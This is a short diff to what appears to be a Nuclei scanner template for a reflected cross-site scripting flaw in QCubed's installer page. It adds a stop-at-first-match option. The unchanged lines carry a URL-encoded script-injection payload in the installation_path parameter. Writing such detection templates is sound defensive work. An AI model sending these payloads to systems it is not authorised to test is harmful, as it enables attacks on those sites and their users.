--- a/vulnerabilities/other/qcubed-xss.yaml
+++ b/vulnerabilities/other/qcubed-xss.yaml
@@ -12,7 +12,8 @@ requests:
     path:
       - "{{BaseURL}}/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
       - "{{BaseURL}}/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
-
+      
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
